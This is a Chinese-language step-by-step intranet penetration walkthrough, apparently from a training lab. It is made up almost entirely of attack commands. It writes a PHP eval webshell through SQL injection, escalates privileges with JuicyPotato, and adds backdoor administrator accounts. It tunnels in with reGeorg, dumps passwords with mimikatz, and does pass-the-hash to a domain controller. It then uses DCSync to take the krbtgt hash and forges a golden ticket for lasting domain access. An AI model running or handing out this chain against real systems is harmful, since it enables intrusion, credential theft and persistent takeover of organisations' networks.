新手内网渗透流程

1、通过sql注入，写入一句话木马

id=7 union select 1,'<?php eval($_REQUEST[8])?>' into outfile 'c:/phpstudy/www/125.php'
函数（相当于数据库备份）：
into outfile、into dumpfile

2、菜刀、蚁剑连接

cmd基本命令
net user 账号 密码 /add (新建账号密码）
net user 账号 密码 (修改账号密码）
Whoami (查看用户权限)
netstat -ano (查看本机开放的端口)
Tasklist (查看本机运行的程序[类似于任务管理器])
Systeminfo (查看计算机信息)
net localgroup administrators /add (提权到管理员组)

3、利用Window的漏洞(最常见手法)

查看windows打了什么补丁，然后去网上找存在什么样的漏洞，然后找对应的提权工具。
网址： https://bugs.hacking8.com/tiquan/

4、烂土豆插件提权

原版：JuicyPotato.exe -t * -p c:\windows\system32\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
魔改：JuicyPotato.exe -p “whomai”

5、提权步骤

JuicyPotato.exe -p “whomai”
JuicyPotato.exe -p “net user 账号 密码 /add”
JuicyPotato.exe -p “net localgroup administrators 账号 /add”

6、利用reGeorgSocksProxy.py文件进行内网访问，（这里需要python2环境支持）

python reGeorgSocksProxy.py -l 127.0. 0.1 -p 10086 -u http://afsgr16-b1ferw.aqlab.cn/110.php

7、打开Proxifier汉化版，设置代理服务器和代理规则

代理服务器设置为127.0.0.1，端口为10086
访问规则设置为mstsc.exe，（标识只监视远程桌面连接的流量）

8、利用新建账号远程访问内网

进入内网，打开猕猴桃软件，进行提权，获取管理员密码
privilege::debug （提升权限）
Log (生成日志）
sekurlsa::logonpasswords （抓取密码）

9、利用查出来的管理员账号密码，访问内网机器10.0.1.8

登录内网10.0.1.8，在继续进行猕猴桃提权。
privilege::debug （提升权限）
Log (生成日志）
sekurlsa::logonpasswords （抓取密码）
发现生成密码为加密的
利用cmd指令systeminfo，查看本机信息，发现本机在（zkaq.cn）域控机器范围内

10、接着域控提权。

上猕猴桃
sekurlsa::logonpasswords （抓取密码）
sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:61465a991b168727b65b3644aab823cd
（登陆用户 域地址 ntlm加密值）
dir \dc.zkaq.cn\c$【查看域控C盘】

11、利用PsExec.exe在cmd窗口进行域控提权

PsExec.exe \\dc.zkaq.cn cmd ([他会去调用域控主机的cmd])

12、接着又是新建一个域控主机的账号

net user 账号 密码 /add
net localgroup administrators 账号 /add
在来查询域控主机IP地址10.0.1.6

13、接着远程登录域控主机

在上猕猴桃
lsadump::dcsync /user:krbtgt 获取krbtgt的密码 [mimikatz 会模拟域控，向目标域控请求账号密码信息]
获得sid和krbtgt的值。就可以退出域控主机了,但还必须处在内网中。
返回10.0.1.8网络。
在猕猴桃处制作黄金票据：
kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-1720693672-3610745784-2269473857 /krbtgt:1176ad25a126d316ed5ea4b60b3d71dd /ticket:administrator.kiribi
[制作票据] （注意不要502）

kerberos::ptt administrator.kiribi [加载票据]
就可以访问域控了，
只要黄金票据存在，
以后就可以直接[加载票据]，进行PsExec.exe在cmd窗口进行域控提权，就遨游内网。